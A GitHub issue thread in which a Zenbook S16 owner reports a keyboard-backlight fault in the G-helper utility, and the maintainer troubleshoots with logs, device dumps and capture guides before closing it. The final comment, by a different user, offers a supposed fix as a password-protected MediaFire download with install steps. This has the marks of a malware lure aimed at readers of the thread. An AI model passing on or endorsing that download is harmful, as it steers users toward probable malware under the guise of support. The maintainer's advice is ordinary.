### ISSUE TITLE
G-helper  /Auto Service Stop and Keyboard lighting issue

### ISSUE THREAD

**Issue by TimMaybeIDKiForgotMyName** [seerge/g-helper#3033]
### Rules

- [X] I made myself familiar with the <a href='https://github.com/seerge/g-helper?tab=readme-ov-file'>Readme</a>, <a href='https://github.com/seerge/g-helper/wiki/FAQ'>FAQ</a> and <a href='https://github.com/seerge/g-helper/wiki/Troubleshooting'>Troubleshooting</a>.
- [x] I understand that, if insufficient information or no app logs will be provided, my issue will be closed without an answer.

### What's wrong?

Hello. I recently purchased a zenbook s16 with the new hx370 cpu. After downloading G-helper and stopping the auto services the keyboard lighting functions fine. All keys that control the light function fine. The issue starts when you fully shutdown the laptop and restart. The function keys no longer controll the keyboard lighting and the keyboard will just "breathe/flash" indefinetly untill you go into G-helper and restart autoservices. Then it reverts back to normal behaviour. I've also noticed that after fully shutting down the laptop, the keyboard will light up and breathe once before shutting down with the rest of the laptop. Not sure if its related. 

### How to reproduce the bug?

1. Shut down auto services.
2. Shut down (not restart) laptop
3. Power on laptop
4. Keyboard should now be stuck on breathing effect loop

### Logs

[log.txt](https://github.com/user-attachments/files/16821648/log.txt)

### Device and Model

Asus Zenbook S16 (HX370)

### Armoury Crate

Uninstalled

### Asus Services

6

### Version

Latest

### OS

Windows 11 24H2 2024-08

**Comment by seerge** [comment]
@TimMaybeIDKiForgotMyName hello,

I was adding some new changes to support newest Vivobooks and ProArt keyboard backlight controls in latest release https://github.com/seerge/g-helper/releases

Can you update to 0.186 and check if it makes a difference ?

Thanks

**Comment by TimMaybeIDKiForgotMyName** [comment]
[log.txt](https://github.com/user-attachments/files/16822104/log.txt)

Unfortunately didn't help. Same issue

**Comment by seerge** [comment]
@TimMaybeIDKiForgotMyName ok, thanks for checking.

Then it could be that new Zenbook has some new and unknown yet init command, that Asus service sends when starts (cause as I understand keyboard becomes normal when you launch services ? )

Can you check 2 separate things

1. Download and run this anciently-looking [USB Deivce Viewer](https://www.nirsoft.net/utils/usbdeview-x64.zip)
Post a screenshot from it, showing all devices with Vendor ID 0b05 (it's Asus). 
![image](https://github.com/user-attachments/assets/5729178b-61a5-4279-95b2-482ccf286bf9)

2. Upload DSDT dump as explained in [this issue (Method 2)](https://github.com/seerge/g-helper/issues/38)

Thanks

**Comment by TimMaybeIDKiForgotMyName** [comment]
i couldnt find any devices with Vendor ID 0b05 and neither a dstd file when I tried to run the second command. This issue is only present when you fully shutdown the laptop. Then it flashes the keyboard once. I believe it resets whatever G-helper did. Because during a normal reboot this does not happen and the keyboard works normally with autoservices off. Also side question. Any way to prevent the autoservice shutdown to have an exception to the Oled Screen Shifter service? Kind of usefull to avoid burnin. 

![image](https://github.com/user-attachments/assets/ad9ebd9e-bb7c-4694-977a-9d233d9f650e)
[Dat.zip](https://github.com/user-attachments/files/16822222/Dat.zip)

**Comment by seerge** [comment]
@TimMaybeIDKiForgotMyName 

First was to check if keyboard can be controlled via USB as it happens on ROG and ProArt, I don't think it's the case here.
As for the second - it's strange, cause DSDT should be there.

Anyway - based on your initial log - your device doesn't seem to offer any backlight controls (that are working) except backlight brightness. So G-Helper doesn't really set anything besides brightness, and that's not your issue

```
30/08/2024 23:16:42: TUF_KB = 16712125 : 0 <--- backlight power is not supported
30/08/2024 23:16:42: AuraMode: AuraStatic
30/08/2024 23:16:42: TUF RGB = B4-00-FF-FF-FF-EB : 0 <--- backlight modes and colors are not supporter
30/08/2024 23:16:42: TUF RGB = B3-00-FF-FF-FF-EB : 0
30/08/2024 23:16:42: TUF RGB = B4-00-FF-FF-FF-EB : 0
30/08/2024 23:16:42: Lid Open
30/08/2024 23:16:42: TUF Brightness = 129 : OK <-- backlight brightness works fine :)
30/08/2024 23:16:42: VIVO Brightness = 129 : OK
```

**Comment by seerge** [comment]
@TimMaybeIDKiForgotMyName the only other way to check what exactly Asus service sends to the device in order to "initi" keyboard, is to actually intercept that command

There is a guide on how to intercept those things, but it's quite difficult process
https://github.com/seerge/g-helper/wiki/_ACPI-Monitoring-and-Debugging

Let me know if you want to try :) 

You will need to follow guide and setup IRPMon first and then: 

1. Stop all asus services via `Extra`
2. Start capture with IRPMon
3. Start asus services
4. Upload capture log here :)

**Comment by TimMaybeIDKiForgotMyName** [comment]
Its getting late so maybe some other time. and also the Oled Shifter  Serviceis pretty usefull.  I do see that keyboard light settings in G-helper is not doing anything even with autoservices running. Except for the laptop backlight slider which does control the brightness.  I was mainly hoping this would help with battery life as its quite dreadfull on this laptop. But I might have to look mroe into debloating windows then just asus services. 

Thank you for the quick help. Have a nice day and good luck with the development

**Comment by seerge** [comment]
@TimMaybeIDKiForgotMyName 

> and also the Oled Shifter Serviceis pretty usefull
I'm not sure what it does on Zenbooks (unless it's some hardware toggle and then most likely it's on by default)

But on ROG OLED laptops the only thing that "pixel shifter" app from Armoury Crate does - is shifts wallpaper image few pixels left and right periodically (by just replacing wallpaper in windows). And you get much better effect if you would just set windows to rotate different wallpapers with time :)

So I can only suspect on Zenbook it does same ? :) 

> I do see that keyboard light settings in G-helper is not doing anything even with autoservices running.

That's mot likely cause your device doesn't have any backlight modes to start with ? :) I assume it's just static white ?

> Thank you for the quick help. Have a nice day and good luck with the development

Ok, then I'm closing this as not planned, as without physical access to device or at least commands intercepted I can't do much for keyboard init here. If you will record something - feel free to reopen

Thanks again

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
